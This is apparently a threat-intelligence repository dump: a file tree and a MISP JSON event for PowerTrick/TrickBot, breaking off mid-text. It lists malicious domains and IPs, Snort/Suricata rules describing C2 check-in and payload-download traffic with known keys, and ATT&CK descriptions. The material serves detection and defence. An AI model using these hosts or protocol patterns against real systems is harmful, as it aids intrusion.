├── IOCs ├── 2020-01-08-powetrick-iocs-vk-misp-json.json └── 2020-01-08-powetrick-iocs-vk-misp-json.json .csv ├── README.md └── mock_panel ├── first.ps1 ├── generic_version.php ├── index_first.php ├── readme.txt └── second.ps1 /IOCs/2020-01-08-powetrick-iocs-vk-misp-json.json: -------------------------------------------------------------------------------- 1 | {"response": [{"Event":{"id":"1295","orgc_id":"1","org_id":"1","date":"2020-01-08","threat_level_id":"2","info":"2020-01-08: PowerTrick IOCs","published":true,"uuid":"5e15e78b-86a0-4665-8047-2a6168f8e8cf","attribute_count":"15","analysis":"0","timestamp":"1578495272","distribution":"1","proposal_email_lock":false,"locked":false,"publish_timestamp":"1578495353","sharing_group_id":"0","disable_correlation":false,"extends_uuid":"","event_creator_email":"vitali.kremez@gmail.com","Org":{"id":"1","name":"VK_INTEL_EVIL","uuid":"5d2fbc3a-e520-4bf9-89b7-1b0a68f8e8cf"},"Orgc":{"id":"1","name":"VK_INTEL_EVIL","uuid":"5d2fbc3a-e520-4bf9-89b7-1b0a68f8e8cf"},"Attribute":[{"id":"227827","type":"domain","category":"Payload delivery","to_ids":true,"uuid":"5e15e7b0-dfe0-4f86-83de-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"drive.staticcontent.kz","Galaxy":[],"ShadowAttribute":[]},{"id":"227828","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-e1dc-4635-b973-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"web000aaa.info","Galaxy":[],"ShadowAttribute":[]},{"id":"227829","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-36c0-4ede-8b82-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"traveldials.com","Galaxy":[],"ShadowAttribute":[]},{"id":"227830","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-3c94-4496-adb9-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"northtracing.net","Galaxy":[],"ShadowAttribute":[]},{"id":"227831","type":"domain","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-7830-468a-a262-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"magikorigin.me","Galaxy":[],"ShadowAttribute":[]},{"id":"227832","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"5e15e7b0-9ea0-42a5-a643-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493872","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"5.9.161.246","Galaxy":[],"ShadowAttribute":[]},{"id":"227833","type":"ip-dst","category":"Network activity","to_ids":true,"uuid":"5e15e7b1-3ef8-4abc-ae54-2a9e19d2faa1","event_id":"1295","distribution":"5","timestamp":"1578493873","comment":"","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"192.99.38.41","Galaxy":[],"ShadowAttribute":[]},{"id":"227834","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-80e4-43e2-baa4-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Task Request\"; content:\"POST\"; http_method; content:\"p=t&p1=\"; offset:0; depth:7; http_client_body; classtype:trojan-activity; sid:9000019; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227835","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-9d20-465c-b6d9-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Task Checkin\"; content:\"POST\"; http_method; content:\"p3=\"; offset:0; depth:3; http_client_body; content:\"p=i\"; http_client_body; content:\"p1=\"; http_client_body; content:\"p2=\"; http_client_body; content:\"p9=\"; http_client_body; classtype:trojan-activity; sid:9000020; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227836","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-6c04-4d0a-a38a-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Task Answer\"; content:\"POST\"; http_method; content:\"p3=\"; offset:0; depth:3; http_client_body; content:\"&p5=\"; http_client_body; content:\"&p=a&\"; http_client_body; content:\"&p1=\"; http_client_body; content:\"&p9=\"; http_client_body; classtype:trojan-activity; sid:9000021; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227837","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-2634-412d-bff7-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Known Key 1\"; content:\"POST\"; http_method; content:\"p1=P4YCVQER8UWpfzxVFmVSDyBLzKL3yV6c\"; http_client_body; classtype:trojan-activity; sid:9000022; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227838","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-ce08-43f4-b248-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick Known Key 2\"; content:\"POST\"; http_method; content:\"p1=ybEsTxhqPuN4uVkemt6WjxaJN8jBdAGLxKeY9a4CnMTLSSq2\"; http_client_body; classtype:trojan-activity; sid:9000026; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227839","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-6060-43cd-9ea8-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick download ver1 bot\"; content:\"?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM=&a=ips\"; http_uri; classtype:trojan-activity; sid:9000023; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227840","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-2a94-49c8-9df5-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick download ver2 bot\"; content:\"?a=irs&x=\"; http_uri; classtype:trojan-activity; sid:9000024; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]},{"id":"227841","type":"snort","category":"Network activity","to_ids":true,"uuid":"5e15ed28-de84-40c0-958f-2a9968f8e8cf","event_id":"1295","distribution":"5","timestamp":"1578495272","comment":"Snort\/Suricata IDS Rules","sharing_group_id":"0","deleted":false,"disable_correlation":false,"object_id":"0","object_relation":null,"value":"alert http $HOME_NET any -> $EXTERNAL_NET any (msg:\"PowerTrick download bot known key\"; content:\"?x=UDRZQ1ZRRVI4VVdwZnp4VkZtVlNEeUJMektMM3lWNmM\"; http_uri; classtype:trojan-activity; sid:9000025; rev:1; metadata:author Jason Reaves;)","Galaxy":[],"ShadowAttribute":[]}],"ShadowAttribute":[],"RelatedEvent":[],"Galaxy":[{"id":"30","uuid":"1d1c9af9-37fa-4deb-a928-f9b0abc7354a","name":"Malpedia","type":"malpedia","description":"Malware galaxy based on Malpedia archive.","version":"1","icon":"shield","namespace":"misp","GalaxyCluster":[{"id":"4907","collection_uuid":"5fc98d08-90a4-498a-ad2e-0edf50ef374e","type":"malpedia","value":"TrickBot","tag_name":"misp-galaxy:malpedia=\"TrickBot\"","description":"A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed","galaxy_id":"30","source":"Malpedia","authors":["Davide Arcuri","Alexandre Dulaunoy","Steffen Enders","Andrea Garavaglia","Andras Iklody","Daniel Plohmann","Christophe Vandeplas"],"version":"2560","uuid":"c824813c-9c79-4917-829a-af72529e8329","tag_id":"31","meta":{"refs":["https:\/\/malpedia.caad.fkie.fraunhofer.de\/details\/win.trickbot","https:\/\/www.cybereason.com\/blog\/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware","https:\/\/blog.malwarebytes.com\/threat-analysis\/2017\/08\/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data\/","http:\/\/www.vkremez.com\/2017\/11\/lets-learn-trickbot-socks5-backconnect.html","https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire\/","http:\/\/www.vkremez.com\/2017\/12\/lets-learn-introducing-new-trickbot.html","https:\/\/blog.trendmicro.com\/trendlabs-security-intelligence\/trickbot-shows-off-new-trick-password-grabber-module","https:\/\/www.fidelissecurity.com\/threatgeek\/2016\/10\/trickbot-we-missed-you-dyre","https:\/\/www.flashpoint-intel.com\/blog\/trickbot-account-checking-hybrid-attack-model\/","http:\/\/www.peppermalware.com\/2019\/03\/quick-analysis-of-trickbot-sample-with.html","https:\/\/blog.malwarebytes.com\/threat-analysis\/2016\/10\/trick-bot-dyrezas-successor\/","https:\/\/www.youtube.com\/watch?v=KMcSAlS9zGE","https:\/\/www.crowdstrike.com\/blog\/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web\/","https:\/\/www.arbornetworks.com\/blog\/asert\/trickbot-banker-insights\/","https:\/\/blog.malwarebytes.com\/threat-analysis\/malware-threat-analysis\/2018\/11\/whats-new-trickbot-deobfuscating-elements\/","https:\/\/www.trustwave.com\/Resources\/SpiderLabs-Blog\/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol\/","http:\/\/www.vkremez.com\/2018\/04\/lets-learn-trickbot-implements-network.html","https:\/\/securityintelligence.com\/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach\/","https:\/\/qmemcpy.io\/post\/reverse-engineering-malware-trickbot-part-2-loader","https:\/\/www.fireeye.com\/blog\/threat-research\/2019\/01\/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html","https:\/\/securityintelligence.com\/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets\/","https:\/\/blog.fraudwatchinternational.com\/malware\/trickbot-malware-works","https:\/\/www.blueliv.com\/research\/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique\/","https:\/\/f5.com\/labs\/articles\/threat-intelligence\/malware\/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms","https:\/\/f5.com\/labs\/articles\/threat-intelligence\/malware\/little-trickbot-growing-up-new-campaign-24412","https:\/\/github.com\/JR0driguezB\/malware_configs\/tree\/master\/TrickBot","https:\/\/escinsecurity.blogspot.de\/2018\/01\/weekly-trickbot-analysis-end-of-wc-22.html","https:\/\/www.webroot.com\/blog\/2018\/03\/21\/trickbot-banking-trojan-adapts-new-module\/","https:\/\/www.fortinet.com\/blog\/threat-research\/deep-analysis-of-trickbot-new-module-pwgrab.html","https:\/\/www.securityartwork.es\/wp-content\/uploads\/2017\/06\/Informe_Evoluci%C3%B3n_Trickbot.pdf","https:\/\/blogs.forcepoint.com\/security-labs\/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets","http:\/\/blog.fortinet.com\/2016\/12\/06\/deep-analysis-of-the-online-banking-botnet-trickbot","https:\/\/www.cyberbit.com\/blog\/endpoint-security\/latest-trickbot-variant-has-new-tricks-up-its-sleeve\/","http:\/\/www.malware-traffic-analysis.net\/2018\/02\/01\/","https:\/\/www.cert.pl\/en\/news\/single\/detricking-trickbot-loader\/","https:\/\/www.trendmicro.com\/vinfo\/us\/security\/news\/cybercrime-and-digital-threats\/evolving-trickbot-adds-detection-evasion-and-screen-locking-features","https:\/\/securityintelligence.com\/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations\/","http:\/\/www.pwc.co.uk\/issues\/cyber-security-data-privacy\/research\/trickbots-bag-of-tricks.html","https:\/\/qmemcpy.io\/post\/reverse-engineering-malware-trickbot-part-3-core","https:\/\/www.ringzerolabs.com\/2017\/07\/trickbot-banking-trojan-doc00039217doc.html","https:\/\/www.youtube.com\/watch?v=EdchPEHnohw","https:\/\/sysopfb.github.io\/malware\/2018\/04\/16\/trickbot-uacme.html","https:\/\/blog.talosintelligence.com\/2018\/07\/smoking-guns-smoke-loader-learned-new.html","https:\/\/www.vkremez.com\/2018\/11\/lets-learn-introducing-latest-trickbot.html","https:\/\/www.youtube.com\/watch?v=lTywPmZEU1A","https:\/\/qmemcpy.github.io\/post\/reverse-engineering-malware-trickbot-part-1-packer","https:\/\/www.botconf.eu\/wp-content\/uploads\/2016\/11\/2016-LT09-TrickBot-Adams.pdf","https:\/\/www.flashpoint-intel.com\/blog\/new-version-trickbot-adds-worm-propagation-module\/"],"synonyms":["TheTrick","TrickLoader","Trickster"]},"local":false}]},{"id":"9","uuid":"c4e851fa-775f-11e7-8163-b774922098cd","name":"Attack Pattern","type":"mitre-attack-pattern","description":"ATT&CK Tactic","version":"8","icon":"map","namespace":"mitre-attack","kill_chain_order":{"mitre-attack":["initial-access","execution","persistence","privilege-escalation","defense-evasion","credential-access","discovery","lateral-movement","collection","command-and-control","exfiltration","impact"],"mitre-mobile-attack":["initial-access","persistence","privilege-escalation","defense-evasion","credential-access","discovery","lateral-movement","effects","collection","exfiltration","command-and-control","network-effects","remote-service-effects"],"mitre-pre-attack":["priority-definition-planning","priority-definition-direction","target-selection","technical-information-gathering","people-information-gathering","organizational-information-gathering","technical-weakness-identification","people-weakness-identification","organizational-weakness-identification","adversary-opsec","establish-&-maintain-infrastructure","persona-development","build-capabilities","test-capabilities","stage-capabilities"]},"GalaxyCluster":[{"id":"1199","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Spearphishing Link - T1192","tag_name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"","description":"Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https:\/\/attack.mitre.org\/techniques\/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs\/web beacons).","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"20138b9d-1aac-4a26-8654-a36b6bbf2bba","tag_id":"726","meta":{"external_id":["CAPEC-163"],"kill_chain":["mitre-attack:initial-access"],"mitre_data_sources":["Packet capture","Web proxy","Email gateway","Detonation chamber","SSL\/TLS inspection","DNS records","Mail server"],"mitre_platforms":["Windows","macOS","Linux"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1192","https:\/\/capec.mitre.org\/data\/definitions\/163.html"]},"local":false},{"id":"1205","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Spearphishing Attachment - T1193","tag_name":"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"","description":"Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https:\/\/attack.mitre.org\/techniques\/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"6aac77c4-eaf2-4366-8c13-ce50ab951f38","tag_id":"727","meta":{"external_id":["CAPEC-163"],"kill_chain":["mitre-attack:initial-access"],"mitre_data_sources":["File monitoring","Packet capture","Network intrusion detection system","Detonation chamber","Email gateway","Mail server"],"mitre_platforms":["Windows","macOS","Linux"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1193","https:\/\/capec.mitre.org\/data\/definitions\/163.html"]},"local":false},{"id":"1050","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Supply Chain Compromise - T1195","tag_name":"misp-galaxy:mitre-attack-pattern=\"Supply Chain Compromise - T1195\"","description":"Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. \n\nSupply chain compromise can take place at any stage of the supply chain including:\n\n* Manipulation of development tools\n* Manipulation of a development environment\n* Manipulation of source code repositories (public or private)\n* Manipulation of source code in open-source dependencies\n* Manipulation of software update\/distribution mechanisms\n* Compromised\/infected system images (multiple cases of removable media infected at the factory)\n* Replacement of legitimate software with modified versions\n* Sales of modified\/counterfeit products to legitimate distributors\n* Shipment interdiction\n\nWhile supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired victim set (Citation: Symantec Elderwood Sept 2012) or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"3f18edba-28f4-4bb9-82c3-8aa60dcac5f7","tag_id":"763","meta":{"external_id":["CAPEC-439"],"kill_chain":["mitre-attack:initial-access"],"mitre_data_sources":["Web proxy","File monitoring"],"mitre_platforms":["Linux","Windows","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1195","https:\/\/capec.mitre.org\/data\/definitions\/437.html","https:\/\/capec.mitre.org\/data\/definitions\/438.html","https:\/\/capec.mitre.org\/data\/definitions\/439.html","https:\/\/blog.avast.com\/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities","https:\/\/cloudblogs.microsoft.com\/microsoftsecure\/2018\/03\/07\/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign\/","https:\/\/www.commandfive.com\/papers\/C5_APT_SKHack.pdf","http:\/\/www.symantec.com\/content\/en\/us\/enterprise\/media\/security_response\/whitepapers\/the-elderwood-project.pdf","https:\/\/www.trendmicro.com\/vinfo\/dk\/security\/news\/cybercrime-and-digital-threats\/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets"]},"local":false},{"id":"1115","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Command-Line Interface - T1059","tag_name":"misp-galaxy:mitre-attack-pattern=\"Command-Line Interface - T1059\"","description":"Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https:\/\/attack.mitre.org\/software\/S0106), which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. [Scheduled Task](https:\/\/attack.mitre.org\/techniques\/T1053)).\n\nAdversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"7385dfaf-6886-4229-9ecd-6fd678040830","tag_id":"728","meta":{"external_id":["T1059"],"kill_chain":["mitre-attack:execution"],"mitre_data_sources":["Process monitoring","Process command-line parameters"],"mitre_platforms":["Linux","macOS","Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1059","https:\/\/en.wikipedia.org\/wiki\/Command-line_interface"]},"local":false},{"id":"1250","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"PowerShell - T1086","tag_name":"misp-galaxy:mitre-attack-pattern=\"PowerShell - T1086\"","description":"PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https:\/\/attack.mitre.org\/software\/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands\/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"f4882e23-8aa7-4b12-b28a-b349c12ee9e0","tag_id":"764","meta":{"external_id":["T1086"],"kill_chain":["mitre-attack:execution"],"mitre_data_sources":["PowerShell logs","Loaded DLLs","DLL monitoring","Windows Registry","File monitoring","Process monitoring","Process command-line parameters"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1086","https:\/\/technet.microsoft.com\/en-us\/scriptcenter\/dd742419.aspx","https:\/\/github.com\/mattifestation\/PowerSploit","https:\/\/github.com\/jaredhaight\/PSAttack","http:\/\/www.sixdub.net\/?p=367","https:\/\/silentbreaksecurity.com\/powershell-jobs-without-powershell-exe\/","https:\/\/blogs.msdn.microsoft.com\/kebab\/2014\/04\/28\/executing-powershell-scripts-from-c\/","http:\/\/www.malwarearchaeology.com\/s\/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf","https:\/\/www.fireeye.com\/blog\/threat-research\/2016\/02\/greater_visibilityt.html"]},"local":false},{"id":"1052","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Local Job Scheduling - T1168","tag_name":"misp-galaxy:mitre-attack-pattern=\"Local Job Scheduling - T1168\"","description":"On Linux and macOS systems, multiple methods are supported for creating pre-scheduled and periodic background jobs: cron, (Citation: Die.net Linux crontab Man Page) at, (Citation: Die.net Linux at Man Page) and launchd. (Citation: AppleDocs Scheduling Timed Jobs) Unlike [Scheduled Task](https:\/\/attack.mitre.org\/techniques\/T1053) on Windows systems, job scheduling on Linux-based systems cannot be done remotely unless used in conjunction within an established remote session, like secure shell (SSH).\n\n### cron\n\nSystem-wide cron jobs are installed by modifying \/etc\/crontab<\/code> file, \/etc\/cron.d\/<\/code> directory or other locations supported by the Cron daemon, while per-user cron jobs are installed using crontab with specifically formatted crontab files. (Citation: AppleDocs Scheduling Timed Jobs) This works on macOS and Linux systems.\n\nThose methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.\n\n### at\n\nThe at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and\/or time, which could also be used for the same purposes.\n\n### launchd\n\nEach launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https:\/\/attack.mitre.org\/techniques\/T1160) or [Launch Agent](https:\/\/attack.mitre.org\/techniques\/T1159), except there is an additional key called StartCalendarInterval<\/code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"c0a384a4-9a25-40e1-97b6-458388474bc8","tag_id":"765","meta":{"external_id":["T1168"],"kill_chain":["mitre-attack:persistence","mitre-attack:execution"],"mitre_data_sources":["File monitoring","Process monitoring"],"mitre_platforms":["Linux","macOS"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1168","https:\/\/developer.apple.com\/library\/content\/documentation\/MacOSX\/Conceptual\/BPSystemStartup\/Chapters\/ScheduledJobs.html","http:\/\/www.thesafemac.com\/new-signed-malware-called-janicab\/","https:\/\/www.virusbulletin.com\/uploads\/pdf\/conference\/vb2014\/VB2014-Wardle.pdf","https:\/\/www.rsaconference.com\/writable\/presentations\/file_upload\/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf","https:\/\/linux.die.net\/man\/5\/crontab","https:\/\/linux.die.net\/man\/1\/at","https:\/\/blog.avast.com\/2015\/01\/06\/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit\/"]},"local":false},{"id":"1165","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Scheduled Task - T1053","tag_name":"misp-galaxy:mitre-attack-pattern=\"Scheduled Task - T1053\"","description":"Utilities such as [at](https:\/\/attack.mitre.org\/software\/S0110) and [schtasks](https:\/\/attack.mitre.org\/software\/S0111), along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. (Citation: TechNet Task Scheduler Security)\n\nAn adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.","galaxy_id":"9","source":"https:\/\/github.com\/mitre\/cti","authors":["MITRE"],"version":"9","uuid":"35dd844a-b219-4e2b-a6bb-efa9a75995a9","tag_id":"766","meta":{"external_id":["CAPEC-557"],"kill_chain":["mitre-attack:execution","mitre-attack:persistence","mitre-attack:privilege-escalation"],"mitre_data_sources":["File monitoring","Process monitoring","Process command-line parameters","Windows event logs"],"mitre_platforms":["Windows"],"refs":["https:\/\/attack.mitre.org\/techniques\/T1053","https:\/\/capec.mitre.org\/data\/definitions\/557.html","https:\/\/technet.microsoft.com\/en-us\/library\/cc785125.aspx","https:\/\/technet.microsoft.com\/en-us\/sysinternals\/bb963902","https:\/\/twitter.com\/leoloobeek\/status\/939248813465853953","https:\/\/social.technet.microsoft.com\/Forums\/en-US\/e5bca729-52e7-4fcb-ba12-3225c564674c\/scheduled-tasks-history-retention-settings?forum=winserver8gen","https:\/\/technet.microsoft.com\/library\/dd315590.aspx"]},"local":false},{"id":"1248","collection_uuid":"dcb864dc-775f-11e7-9fbb-1f41b4996683","type":"mitre-attack-pattern","value":"Scripting - T1064","tag_name":"misp-galaxy:mitre-attack-pattern=\"Scripting - T1064\"","description":"Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could 